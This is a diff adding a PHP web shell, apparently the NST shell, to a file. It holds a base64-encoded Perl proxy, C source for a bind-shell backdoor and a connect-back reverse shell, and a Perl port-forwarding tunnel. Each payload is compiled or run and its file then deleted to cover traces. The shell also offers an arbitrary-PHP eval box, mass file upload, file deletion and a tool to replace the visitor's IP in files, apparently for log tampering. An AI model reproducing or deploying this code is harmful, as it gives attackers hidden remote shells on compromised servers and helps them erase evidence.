xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("perl /tmp/nst_perl_proxy.pl $port &");
+unlink("/tmp/nst_perl_proxy.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_proxy_tmp");
+$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
+unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
+rmdir(".nst_proxy_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_proxy
+
+if($_POST['c_bd']){
+$port=$_POST['port'];
+$c_bd_scp = "#define PORT $port
+#include <stdio.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
+struct sockaddr_in serv_addr;
+struct sockaddr_in client_addr;
+
+int main ()
+{
+    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (soc_des == -1)
+        exit(-1);
+    bzero((char *) &serv_addr, sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    serv_addr.sin_port = htons(PORT);
+    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
+    if (soc_rc != 0)
+        exit(-1);
+    if (fork() != 0)
+        exit(0);
+    setpgrp();
+    signal(SIGHUP, SIG_IGN);
+    if (fork() != 0)
+        exit(0);
+    soc_rc = listen(soc_des, 5);
+    if (soc_rc != 0)
+        exit(0);
+    while (1) {
+        soc_len = sizeof(client_addr);
+        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
+        if (soc_cli < 0)
+            exit(0);
+        cli_pid = getpid();
+        server_pid = fork();
+        if (server_pid != 0) {
+            dup2(soc_cli,0);
+            dup2(soc_cli,1);
+            dup2(soc_cli,2);
+            execl(\"/bin/sh\",\"sh\",(char *)0);
+            close(soc_cli);
+            exit(0);
+        }
+    close(soc_cli);
+    }
+}
+
+";
+
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
+passthru("/tmp/nst_bd &");
+unlink("/tmp/nst_c_bd.c");
+unlink("/tmp/nst_bd");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
+passthru(".nst_bd_tmp/nst_bd &");
+unlink(".nst_bd_tmp/nst_bd");
+unlink(".nst_bd_tmp/nst_c_bd.c");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of c bd
+
+
+if($_POST['bc_c']){ # nc -l -p 4500
+$port_c = $_POST['port_c'];
+$ip=$_POST['ip'];
+$bc_c_scp = "#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+
+int fd, sock;
+int port = $port_c;
+struct sockaddr_in addr;
+
+char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
+char shell[] = \"/bin/sh\";
+
+int main(int argc, char *argv[]) {
+        while(argc<2) {
+        fprintf(stderr, \" %s <ip> \", argv[0]);
+        exit(0); }
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(port);
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+fd = socket(AF_INET, SOCK_STREAM, 0);
+connect(fd, (struct sockaddr*)&addr, sizeof(addr));
+
+send(fd, mesg, sizeof(mesg), 0);
+
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+execl(shell, \"in.telnetd\", 0);
+
+close(fd);
+return 1;
+}
+
+";
+
+if(is_writable("/tmp")){
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
+$fp=fopen("/tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
+passthru("/tmp/nst_bc_c $ip &");
+unlink("/tmp/nst_bc_c");
+unlink("/tmp/nst_bc_c.c");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bc_c_tmp");
+$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
+passthru(".nst_bc_c_tmp/nst_bc_c $ip &");
+unlink(".nst_bc_c_tmp/nst_bc_c.c");
+unlink(".nst_bc_c_tmp/nst_bc_c");
+rmdir(".nst_bc_c_tmp");
+}
+}
+$show_ps="1";
+
+}#end of back connect C
+
+
+if($_POST['datapipe_pl']){
+$port_2=$_POST['port_2'];
+$port_3=$_POST['port_3'];
+$ip=$_POST['ip'];
+$datapipe_pl = "
+#!/usr/bin/perl
+# coded by CuTTer (rus hacker)
+use IO::Socket;
+use POSIX;
+
+\$localport=$port_2;
+\$host=\"$ip\";
+\$port=$port_3;
+
+\$daemon=1;
+
+\$DIR = undef;
+
+## Âûâîäèòü ëîã ñîáûòèé (1-äà, 0-íåò)
+\$log=0;
+
+
+
+
+\$| = 1;
+
+if (\$daemon){
+        print \"3anycKaeM daemon\n\";
+
+        \$pid = fork;
+        exit if \$pid;
+        die \"Couldn't fork: \$!\" unless defined(\$pid);
+        POSIX::setsid() or die \"Can't start a new session: \$!\";
+}
+
+%o = ('port' => \$localport,
+          'toport' => \$port,
+          'tohost' => \$host);
+
+\$ah = IO::Socket::INET->new(
+                         'LocalPort' => \$localport,
+                         'Reuse' => 1,
+                         'Listen' => 10)
+    || die \"Íåëüçÿ îòêðûòü ñîêåò äëÿ ñîåäèíåíèé: \$!\";
+
+print \"Íà÷èíàåì âûïîëíåíèÿ öèêëà.\n\" if \$log;
+\$SIG{'CHLD'} = 'IGNORE';
+\$num = 0;
+while (1) {
+        \$ch = \$ah->accept();
+        if (!\$ch) {
+                print STDERR \"Ïðåðâàíî âûïîëåíèå accept: \$!\n\";
+                next;
+        }
+
+        printf(\"Íîâûé êëèåíò: host %s, port %s.\n\",
+        \$ch->peerhost(), \$ch->peerport()) if \$log;
+        ++\$num;
+        \$pid = fork();
+        if (!defined(\$pid)) {
+                print STDERR \"Íåâîçìîæíî âûïîëíèòü fork: \$!\n\";
+    } elsif (\$pid == 0) {
+## Íîâûé ïðîöåññ
+                \$ah->close();
+                Run(\%o, \$ch, \$num);
+        } else {
+                print \"Parent: Fork ïðîøåë óñïåøíî, çàêðûâàåì ñîêåò.\n\" if \$log;
+                \$ch->close();
+        }
+}
+
+
+sub Run {
+        my(\$o, \$ch, \$num) = @_;
+        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
+                                                        'PeerPort' => \$o->{'toport'});
+        print(\"Child: Äåëàåì ðåäèðåêò íà \$o->{'tohost'}, ïîðò \$o->{'toport'}.\n\") if \$log;
+        if (!\$th) {
+                printf STDERR (\"Child: Ïðåðâàí ðåäèðåêò íà %s, ïîðò %s.\n\",
+                \$o->{'tohost'}, \$o->{'toport'});
+                exit 0;
+        }
+
+        my \$fh;
+        if (\$o->{'dir'}) {
+                \$fh = Symbol::gensym();
+                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
+                or die \"Child: Ïðåðâàíî ñîçäàíèå ëîã ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\";
+        }
+
+        \$ch->autoflush();
+        \$th->autoflush();
+        while (\$ch || \$th) {
+                print \"Child: Âêëþ÷àåì öèêë.\n\" if \$log;
+                my \$rin = \"\";
+                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
+                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
+                my(\$rout, \$eout);
+                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
+                if (!\$rout  &&  !\$eout) {
+                        print STDERR \"Child: Îøèáêà Timeout.\n\";
+                }
+                my \$cbuffer = \"\";
+                my \$tbuffer = \"\";
+
+                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
+                        print \"Child: Æäåì äàííûõ îò êëèåíòà.\n\" if \$log;
+                        my \$result = sysread(\$ch, \$tbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Îøèáêà ïðè ñ÷èòûâàíèè äàííûõ êëèåíòà: \$!\n\";
+                                exit 0;
+                        }
+                        if (\$result == 0) {
+                                print \"Child: Êëèåíò îòñîåäèíèëñÿ.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+                }
+
+                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
+                        print \"Child: Æäåì äàííûõ.\n\" if \$log;
+                        my \$result = sysread(\$th, \$cbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Íåâîçìîæíî ñ÷èòàòü äàííûå: \$!\n\";
+                                exit 0;
+                        }
+
+                        if (\$result == 0) {
+                                print \"Child: Ïðîèçîøëî îòñîåäèíåíèå.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+            }
+
+                if (\$fh  &&  \$tbuffer) {
+                        (print \$fh \$tbuffer);
+                }
+
+                while (my \$len = length(\$tbuffer)) {
+                        print \"Child: Îòïðàâëÿåì \$len áàéò.\n\" if \$log;
+                        my \$res = syswrite(\$th, \$tbuffer, \$len);
+                        print \"Child: Äàííûå îòïðàâëåíû.\n\" if \$log;
+                        if (\$res > 0) {
+                                \$tbuffer = substr(\$tbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\";
+                        }
+                }
+
+                while (my \$len = length(\$cbuffer)) {
+                        print \"Child: Îòïðàâëÿåì \$len áàéò êëèåíòó.\n\" if \$log;
+                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
+                        print \"Child: Äàííûå îòïðàâëåíû..\n\" if \$log;
+                        if (\$res > 0) {
+                                \$cbuffer = substr(\$cbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\";
+                        }
+                }
+        }
+}
+
+";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("perl /tmp/nst_perl_datapipe.pl &");
+unlink("/tmp/nst_perl_datapipe.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_datapipe_tmp");
+$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
+unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
+rmdir(".nst_datapipe_tmp");
+}
+}
+$show_ps="1";
+
+}#end of datapipe perl
+
+
+
+
+
+if($show_ps=="1"){
+print "<center><b>[ps ux]</b></center><br><br>";
+print "<pre>";
+passthru("ps ux");
+print "</pre><br><br>";
+}
+
+
+
+echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
+<Br>
+md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/down_sys_scripts.php?get=nst_online_md5_cd.rar>DOWNLOAD</a>]
+</form>
+";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
+echo "<br>
+<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
+Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post><b>DES:</b><br><input name=des size=30><br>
+John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
+
+print "
+<b>eval:</b<br>
+(example: print \"Hello World\";)
+<form method=post>
+<font color=red><b>&lt;?</b><br>
+<textarea name=eval rows=15 cols=113></textarea><br>
+<b>?&gt;</b></font><br>
+<input type=submit value=Run style='width:150px;'>
+</form><br>
+";
+
+function eval_sl($editf){
+if(get_magic_quotes_gpc()==1){
+$editf=stripslashes($editf);
+}
+return $editf;
+}
+
+
+if($_POST['eval']){
+print "<b>RESULT:<br><br></b>";
+eval(eval_sl($_POST['eval']));
+print "<br><br>";
+
+print "<font color=green><b>PHP:</b><br>\r\n\r\n";
+print "&lt;?\r\n";
+print "<br>";
+print htmlspecialchars(eval_sl(($_POST['eval'])));
+print "<br>";
+print "?&gt;\r\n\r\n</font><br><br>";
+
+}
+
+echo $copyr;
+exit;}
+
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+Replace tool:<br>
+(You can replace any text)<br>
+File: $de<br>
+<form method=post>
+1. Your ip.<br>
+2. microsoft.com ip :)<br>
+Replace this <input name=this size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Replace>
+</form>
+";
+
+if(@$_POST['doit']){
+@$this=$_POST['this'];
+@$bythis=$_POST['bythis'];
+@$e=$_GET['e'];
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$this","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$this Replaced by $bythis<br>
+[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="upload"){
+echo "<br>
+<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
+File upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text size=50><br>
+<input name=where size=52 value='$d'><br>
+New file name:<br>
+<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
+<input type=submit value=Upload name=uploadf>
+</form><br>
+";
+
+if(@$_POST['uploadf']){
+$where=$_POST['where'];
+$newf=$_POST['newf'];
+$where=str_replace("//","/",$where);
+if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
+$uploadfile = "$where/".$newf;
+if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
+$uploadfile=str_replace("//","/",$uploadfile);
+echo "<i><br>Uploaded to $uploadfile</i><br>";
+}else{
+echo "<i><br>Error</i><br>";}
+}
+}
+
+if(@$_GET['t']=="massupload"){
+echo "
+Mass upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$d'><br>
+<input type=submit value=Upload name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile20</i><br>";}
+}
+echo $copyr;
+exit;}
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
